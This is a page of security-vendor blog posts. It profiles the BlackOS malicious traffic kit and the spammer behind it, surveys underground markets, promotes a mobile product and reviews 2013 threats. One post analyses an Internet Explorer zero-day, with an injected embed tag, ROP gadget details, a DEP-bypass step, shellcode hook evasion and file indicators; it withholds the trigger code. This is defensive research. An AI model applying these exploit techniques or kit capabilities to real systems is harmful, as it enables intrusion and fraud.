Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Author Archive - Trend Micro

    We recently came across this particular post in an underground forum:

    Figure 1. Underground forum post

    This particular post in Russian was advertising a new product, known as “BlackOS”. Contrary to the name, it is not an operating system. However, it is definitely “black”, or malicious: it is used to manage and redirect Internet traffic from malicious/compromised websites to other malicious sites.

    These types of products are not new in underground communities – for example, Brian Krebs talked about the similar site almost two years ago. Even BlackOS itself is not completely new. It is a new version of the earlier “Tale of the North” software, described by security researchers in September 2013.

    Capabilities of BlackOS

    BlackOS and other similar packages are designed to automate the process of managing and exploiting websites easier. This allows a cybercriminal to squeeze out the most profit from his victims. It has a web interface which is used to manage the web traffic and its different features. It can cope with high volumes of Internet traffic, and inject iframes and redirect traffic as specified by its user.

    Here are some of the features of BlackOS, as stated in an advertisement in underground forums (as translated from the original Russian):

    1) Implement the optimal model of converting traffic. Distribute and installs on geo user agent;
    2) Get a unique opportunity to refuse to sell iframe traffic ;
    3) Automatically detect PR domains , links and implement an effective impact on the issuance of search engines ;
    4) Get a fast , stable and socks5 private lists for any of your software, requiring the use of proxy;
    5) Sort the list of accounts as fast as possible ;
    6) Upload any of your scripts with verification . Pour shells and mass execute commands on them set / code cleanup , eval (), system (), sendmail and check antiDDOS ;
    7) Perform a vulnerability scan on your servers
    8) Proccess the parsing Databases of remote CMS

    New features for managing accounts, along with a powerful SEO tools and interface as intuitive novice webmasters and professionals allow us to hope that BlackOS take its rightful place on your work space.

    BlackOS is not particularly cheap. It costs $3,800 a year; a reinstall/rebuild costs $100. For cybercriminals on a budget, basic configurations (16GB of RAM, octacore CPU, and SSD storage) can be rented for $100 a month. (The creators of BlackOS only accept payment in Bitcoin, Litecoin, or Perfect Money.)

    One of the features of BlackOS is integration with online scanners that check if a website is already blocked by various security solutions, as seen below:

    Figure 2. Online scanner
    (Click image above to enlarge)

    As we mentioned earlier, BlackOS appears to be an updated version of the previous Tale of the North package. One may ask why, then, is it being sold as “new” software? For that, we have to look into the Tale of the North and its author, Peter Severa.

    Peter Severa and the Tale of the North

    Peter Severa, who uses the handle Severa in various underground forums, began as a spammer as far back as 2003. He has used various spam botnets to send spam, including the Waledac and Kelihos botnets – in fact, he is currently facing criminal charges relating to his use of the latter. This has not scared him, though: to this day he is still active in the underground.

    His ICQ and Jabber accounts are well-known to the underground community; he also had a Webmoney account at one time, although that account was banned. We believe that the now-banned account was used by another “handle”, which was actually Severa hiding his identity. We also believe that Severa has a new Webmoney account.

    Severa wrote Tale of the North to manage the web traffic coming from users clicking links in his spam emails. For example, he could redirect users to various websites based on their geographic location.

    Recently, however, there appears to have been a dispute between Severa and other people involved with Tale of the North. According to the following underground forum post, Severa left the project and the other “contributors” have continued under the BlackOS name:

    Figure 3. Underground forum post
    (Click image above to enlarge)

    A partial translation of that post follows:

    BlackOS previously sold as North Tale. We had a team and there was a conflict, and I closed the project. The system is now marketed under the name BlackOS, and I have nothing to do with it now. I make no claims to manager/BlackOS; all conflicts between us completely settled and I wish him success in his future development and sales of the software. It ‘s a really cool product that is unparalleled in the market, which required a decent number of man-years of development

    We don’t know much about who’s selling BlackOS now. His Jabber account is publicly known (so would-be clients can contact him), and he also goes by the handle manager. Beyond that, his identity is unclear.

    What about Severa? He hasn’t left the underground community. He is now running two active affiliate programs—both named partially after himself: SevPod and SevSka—that spread spambot malware.

    In February, Severa was advertising SevPod in forum posts, like this one:

    Figure 4. SevPod advertisement
    (Click image above to enlarge)

    A partial translation follows:

    I want to introduce you to your new project – a private affiliate for substitution issue, {affiliate program URL}. I managed to make a really long-lived substitute, and your download will bring you income for many months, even after you stop shipping. Unlike other substitutions, I have bids for virtually all countries. Of course, miracles do not happen, and you will get the maximum revenue from the US, Canada, Australia, UK, Western Europe, but the third world countries will be bring you a steady income for a long time to! 95% of the money that I get for clicks from feed providers, I’m pay for your your ads.

    The about page for SevPod goes on:

    … is the latest revolutionary affiliate program by substitution SERPs. We get maximum bids from our feed providers, 95% of the funds we receive we give to our clients. Convert clicks from almost all countries of the world. We also use more modern methods of monetizing traffic, such as pay per user activity on the site, pay per view and interactions with different content. Unlike click bot traffic, we use live traffic, so our traffic is much more expensive, and will bring you income for a long time.

    From these posts and sites, it is clear that Severa is still involved in the traffic redirection business and spam, although one could say he is focusing more on the “business” aspect of cybercrime than the technical aspects.

    The information we gathered in this post was taken from various underground sources, although all of it was essentially public. We urge any law enforcement agencies investigating Severa or the creators of BlackOS to reach out to us, as we have additional information that is not part of this post.

    Posted in Bad Sites, Malware | Comments Off

    Places in the Internet where cybercriminals come together to buy and sell different products and services exist. Instead of creating their own attack tools from scratch, they can instead purchase what they need from peers who offer competitive prices. Like any other market, the laws of supply and demand dictate prices and feature offerings. But what’s more interesting to note is that recently, prices have been going down.

    Over the years, we have been keeping tabs on major developments in the cybercriminal underground. Constant monitoring of cybercriminal activities for years has allowed us to gather intelligence to characterize the more advanced markets we have seen so far and come up with comprehensive lists of offerings in them.

    In 2012, we published “Russian Underground 101,” which showcased what the Russian cybercriminal underground market had to offer. Later that year, we worked with the University of California Institute of Global Conflict and Cooperation to publish “Investigating China’s Online Underground Economy,” which featured the Chinese cybercriminal underground.

    Last year, we revisited the Chinese underground and published “Beyond Online Gaming: Revisiting the Chinese Underground Market.” We learned then that every country’s underground market has distinct characteristics. So this year, we will add another market to our growing list: Brazil.

    The barriers to launching cybercriminal operations have greatly lessened in number. Toolkits are becoming more available and cheaper; some are even offered free of charge. Prices are lower and features are richer. Underground forums are thriving worldwide, particularly in Russia, China, and Brazil. These have become popular means to sell products and services to cybercriminals in the said countries.

    Cybercriminals are also making use of the Deep Web to sell products and services outside the indexed or searchable World Wide Web, making their online “shops” harder for law enforcement to find and take down.

    Our first cybercrime economy update for the year will focus on the burgeoning market for mobile malware/scam-related tools and software in China, to be released next week on March 3.

    All of these developments mean that the computing public is at risk of being victimized more than ever and must completely reconsider how big a part security should play in their everyday computing behaviors. In the coming months we will dig deeper into these, and present our findings to educate users.

    Posted in Malware | Comments Off

    11:45 am (UTC-7)   |    by

    In these times, embracing consumerization is not only inevitable for any company; it is now, at some level, necessary. It’s become a powerful business tool, providing efficiency to the company, as well as convenience to the employees. The usage of mobile devices in corporate environments is a primary example of how enterprises apply consumerization, a practice that enterprises apply more and more each day.

    With continued adoption comes challenges. The risks around mobile threats are typically focused on malicious apps, but for enterprises there are other problems. Since the devices are used to store, send, and receive corporate data, protecting them from unauthorized access is critical to the company. So how can we maintain enterprise-level security in consumer-level devices?

    The risks entailed by consumerization has proven to be difficult to deal with — the complexity of managing multiple platforms, separating personal and corporate data, avoiding data leakage, and addressing privacy concerns has enterprises struggling to find the balance between convenience and security. And as the balance remains to be achieved, the risk grows. Mismanaging consumerization has proven to be costly for enterprises, as cybercriminals now see the inclusion of mobile devices in enterprise networks as an addition to their attack surface — a new vector that they can use to infiltrate.

    In the past we’ve talked about a three-step plan to consumerization, which includes having a plan, identifying a set of policies to implement, and putting in the right infrastructure to apply the identified policies.

    Our Trend Micro Safe Mobile Workforce is an example of the infrastructure that can be used in embracing consumerization. It is a virtual mobile infrastructure solution that aims to answer the needs of both IT managers and employees in consumerization by providing a clear infrastructure that separate corporate and personal data. It hosts the mobile operating system on centralized servers to provide a safe infrastructure whenever users need to access corporate information.

    What does this mean for users? It means that their corporate mobile environment is not stored in their device, so their data remains secure even if the device gets lost. They can also access their environment from any location, without being tied to a single device. This also means that there is no limitation in terms of functionality when the employee uses the device for personal purposes.

    What does this mean for IT administrators? it means that they will be able to fully manage and maintain all corporate environments connected to the network (Android and iOS) through the centralized server. And since Safe Mobile Workforce completely separates corporate and user data, administrators get to have full control of the corporate environment without worrying about privacy concerns from the employees.

    To get a better idea of how the Trend Micro Safe Mobile Workforce works, check out our infographic, Split Screen: Separating Corporate from Personal Data on Mobile Devices.

    Posted in Mobile | Comments Off

    Any vulnerability in Internet Explorer is a large issue, but last week’s zero-day vulnerability (designated as CVE-2014-0322) is particularly interesting. It used what we call a “hybrid exploit”, where the malicious exploit code is split across multiple components that use differing technology: in this case, the exploit code was split between JavaScript and Adobe Flash. The use of “hybrid exploits” provides attackers with a way to evade existing mitigation technology like ASLR and DEP.

    Let’s go over how this exploit was delivered to users. The victim website was compromised, and two malicious files were uploaded to it:

    • Erido.jpg (detected as HTML_EXPLOIT.PB, MD5 hash: 00ae7a1514809749a57d4d05d8c969b5)
    • Tope.swf (detected as SWF_EXPLOIT.PB, MD5 hash: 732b6a98b0a7b2ee795f2193a041520d)

    The overall flow can be found in the following diagram, which will be explained in the text.

    Figure 1. Overall control flow

    A page on the website (img.html) was modified with additional JavaScript and an iframe to load the malicious Flash file, as follows:

    <embed src=Tope.swf width=10 height=10></embed>

    When called, the Flash file carries out a heap spray. Control is then passed back to the JavaScript, via a function call in the Flash file. The actual malicious code that triggers CVE-2014-0322 is actually found here, and not in the Flash file. (To prevent further attacks that may exploit this vulnerability, we will not provide further details about the exploit.) Control is then passed back to the Flash file, where the code responsible for arbitrary memory reads and writes is located.

    From here on, the goal of the code is simple: it searches for return-oriented programming (ROP) gadgets in the memory (specifically, it uses ROP gadgets in ntdll.dll), constructs the ROP chain, and overwrite the virtual table of a Flash object in order to hijack the execution flow of the Flash virtual machine.

    Two ROP gadgets were used in this attack:

    • 77a646a8 94 xchg eax,esp // Pivot the stack pointer
    • ntdll!ZwProtectVirtualMemory (1a1b3000, 1000, PAGE_EXECUTE_READWRITE)

    The first ROP gadget pivots the stack pointer to let it point to controlled data; the second gadget calls ZwProtectVirtualMemory to change this shellcode’s protection to PAGE_EXECUTE_READWRITE, to bypass DEP protection.

    If this shellcode needs to call APIs, it will first check whether the API is hooked inlineby checking the starting byte code of the API. If that is the case, then it will skip the first 5 bytes of the API, to escape from the hook. This technique is used to bypass the detection of security products that are watching for this behavior.

    Figure 2. Malicious shellcode

    The above shellcode does the following:

    1. Decode two PE files using the data in the file Erido.jpg
    2. Drops the two PE files to:
      • %Temp%\sqlrenew.txt
      • %Temp%\stream.exe
    3. Load the contents of sqlrenew.txt into memory
    4. Return to the caller to prevent a Flash or IE crash

    The contents of sqlrenew.txt merely executes the other dropped file, stream.exe. However, this will only happen when IE has been terminated and the module itself is being unloaded.

    Figure 3. Malicious shellcode


    Any zero-day vulnerability in a widely used program like Internet Explorer is significant, but this one appears to be doubly so. To avoid known exploit mitigation techniques like ASLR and DEP, this attack uses multiple web objects interacting with each other to carry out the exploit instead of a single easily detected file.

    It is likely that we will see more of this technique in the future as cybercriminals try to make their exploits more effective on all platforms. Both developers and security vendors will need to respond to this emerging threat in order to keep users safe.

    Posted in Exploits, Vulnerabilities | Comments Off

    2013 was another year marked by many changes – for good and bad – in the threat landscape. Some threats waned, others grew significantly, while completely new threats emerged and made life difficult for users. What remained constant, however, were the threats against the safety of digital information. In this entry, we present some of these threats that were seen last year. These are described in more detail in our roundup titled Cashing In On Digital Information

    Cybercrime: Banking Malware, CryptoLocker Grow; Blackhole Exploit Kit Tumbles

    Some malware types linked to cybercrime grew significantly in 2013. We saw almost a million new banking malware variants, which was double what we saw in 2012. Much of this growth occurred in the latter half of the year:

    Figure 1. Volume of new banking malware

    Two countries – the United States and Brazil – accounted for half of all banking malware victims:

    Figure 2. Countries most affected by banking malware

    We saw ransomware become far more potent in the latter part of the year as CryptoLocker emerged as a new threat that hit users hard. This new threat – an evolution of previous ransomware attacks – encrypted the data of users, requiring a one-time payment of approximately $300 (payable in cryptocurrencies like Bitcoin) before their data would be decrypted. In some ways, CryptoLocker became as serious a problem for end users as fake antivirus malware had in previous years.

    The fall of the Blackhole Exploit Kit in 2013 due to the arrest of its creator, Paunch, was a significant event that appreciably changed the threat landscape. It significantly cut the use of malicious links in spam messages by attackers. While other exploit kits have emerged into the threat landscape since then, no other kit has achieved BHEK’s levels of prominence.

    Targeted Attacks and Data Breaches: Still In Operation

    Despite reduced media attention, targeted attacks continued to hit organizations across the world last year. We observed attacks in many parts of the world, with countries in Asia at particular risk from these coordinated targeted attacks. Well-organized campaigns like EvilGrab and Safe highlighted the capabilities and sophistication of modern targeted attacks.

    Figure 3. Countries affected by targeted attacks

    Data breaches also continued to plague organizations. Companies like Adobe, Evernote, and LivingSocial were all hit by various breaches that exposed the customer data of millions of users. Breaches like these not only cause a loss of face for the affected organizations, but may also put them at legal risk for failing to protect the data of their users.

    Mobile Threats: Mobile Banking Under Fire

    Mobile threats continued to flourish last year, with an estimated one million malicious and high-risk apps found in the year alone. Significantly, we saw increasing use of mobile banking threats like the PERKEL and FAKEBANK families, both of which put users of mobile banking apps and websites at the same risk of fraud and financial loss that other users face. Information stealers like banking malware are now the third most common type of malicious/high-risk app found, behind traditional standbys like premium service abusers and adware:

    Figure 4. Types of mobile malware threats

    Digital Life: Privacy at Risk

    Revelations about government spying made many question if online privacy was still alive, or even possible. Previously, users had always worried that cybercriminals could get their hands on one’s personal information; now they worry about large, previously trusted organizations – both government and private – doing the same thing.

    Attacks delivered via social media (combined with social engineering) have now become the norm, with newer social networks like Instagram, Pinterest, and Tumblr suffering from their own scams as well. Indeed, attacks on all social media platforms have become so common, it may almost be considered “business as usual.”

    For a more comprehensive analysis of these threats, check our 2013 roundup titled Cashing In On Digital Information.

    Posted in Bad Sites, Exploits, Malware, Mobile, Social, Spam, Targeted Attacks | Comments Off


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice